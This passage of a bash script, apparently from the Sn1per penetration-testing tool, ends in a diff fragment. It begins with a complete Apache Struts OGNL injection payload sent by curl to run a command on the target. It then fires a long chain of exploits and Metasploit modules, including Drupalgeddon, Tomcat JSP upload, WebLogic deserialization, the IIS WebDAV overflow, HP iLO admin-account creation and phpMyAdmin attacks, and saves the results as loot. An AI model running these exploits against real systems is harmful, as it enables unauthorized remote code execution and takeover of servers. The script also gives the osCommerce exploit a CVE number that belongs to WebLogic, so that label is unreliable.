curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET:$PORT | head -n 1
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u http://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET:$PORT
if [ $SCAN_TYPE == "DOMAIN" ]; then
if [ $OSINT == "0" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SKIPPING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
goohak $TARGET > /dev/null
fi
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
GHDB="1"
clusterd -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt
fi
if [ "$SHOCKER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
fi
if [ "$JEXBOSS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [ $METASPLOIT_EXPLOIT = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
fi
source modes/osint_stage_2.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
if [ "$LOOT" = "1" ]; then
loot
fi
exit
fi
fi

View File

@ -73,208 +73,320 @@ if [ "$MODE" = "webporthttps" ]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-$PORT 2> /dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-$PORT 2> /dev/null
echo ""
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
if [ "$WAFWOOF" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f https://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-https-port$PORT.txt 2> /dev/null
echo ""
fi
if [ "$WHATWEB" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 https://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-https-port$PORT.raw 2> /dev/null
echo ""
fi
if [ "$WIG" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q https://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-https-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https-$PORT > $LOOT_DIR/web/wig-$TARGET-https-$PORT.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET-$PORT.txt 2> /dev/null
if [ "$SSL" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
sslyze --regular $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
